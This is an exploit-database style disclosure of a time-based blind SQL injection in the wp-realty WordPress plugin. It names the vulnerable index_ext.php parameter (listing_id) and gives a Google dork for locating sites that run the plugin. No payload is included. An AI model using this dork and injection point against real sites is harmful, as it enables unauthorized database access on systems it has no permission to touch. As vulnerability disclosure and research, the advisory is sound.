Wordpress - wp-realty Plugin- Blind SQL Injection [Anonymoused]

2013-10-17 23:05:03

$$$$$$\ $$\ $$\ $$$$$$\
$$ __$$\ $$ | $$ | $$ __$$\
$$ / \__| $$ | $$ | $$ / \__|
$$ |$$$$\ $$$$$$$$ | \$$$$$$\
$$ |\_$$ | $$ __$$ | \____$$\
$$ | $$ | $$ | $$ | $$\ $$ |
\$$$$$$ |$$\ $$ | $$ |$$\\$$$$$$ |
\______/ \__|\__| \__|\__|\______/

# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos


Link: http://localhost/wordpress/wp-content/plugins/wp-realty/

Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]


Credits to: Greek Hacking Scene

Fixes

No fixes

In order to submit a new fix you need to be registered.